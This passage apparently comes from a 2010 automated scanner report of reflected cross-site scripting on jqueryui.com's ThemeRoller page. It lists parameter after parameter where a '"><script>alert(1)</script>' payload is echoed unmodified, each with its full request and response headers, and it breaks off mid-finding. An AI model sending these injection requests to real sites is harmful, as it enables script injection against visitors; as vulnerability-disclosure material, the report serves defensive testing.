The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1722"><script>alert(1)</script>3fa67dfb137 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74c1722"><script>alert(1)</script>3fa67dfb137&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40feb"><script>alert(1)</script>2127341874 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif40feb"><script>alert(1)</script>2127341874&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd562"><script>alert(1)</script>d38fcc48096 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12pxcd562"><script>alert(1)</script>d38fcc48096&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36130"><script>alert(1)</script>7eb2177a8ce was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold36130"><script>alert(1)</script>7eb2177a8ce&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120065
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9a1e"><script>alert(1)</script>1bc403df73c was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01e9a1e"><script>alert(1)</script>1bc403df73c&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad48"><script>alert(1)</script>c3cfabee311 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70fad48"><script>alert(1)</script>c3cfabee311&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5253d"><script>alert(1)</script>c643bd72dbb was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad5253d"><script>alert(1)</script>c643bd72dbb&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aadc9"><script>alert(1)</script>93993d12d9 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0aaadc9"><script>alert(1)</script>93993d12d9&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ce9"><script>alert(1)</script>9fcb678b763 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b38ce9"><script>alert(1)</script>9fcb678b763&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67aae"><script>alert(1)</script>d3e33429518 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff67aae"><script>alert(1)</script>d3e33429518&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164db"><script>alert(1)</script>6a00d66429c was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI ...[SNIP]...
3.189. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c71b"><script>alert(1)</script>cc48d1bc9db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?2c71b"><script>alert(1)</script>cc48d1bc9db=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:08:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f8ed"><script>alert(1)</script>e7a1c93907c was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6f8ed"><script>alert(1)</script>e7a1c93907c&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bb8"><script>alert(1)</script>18668a6627e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
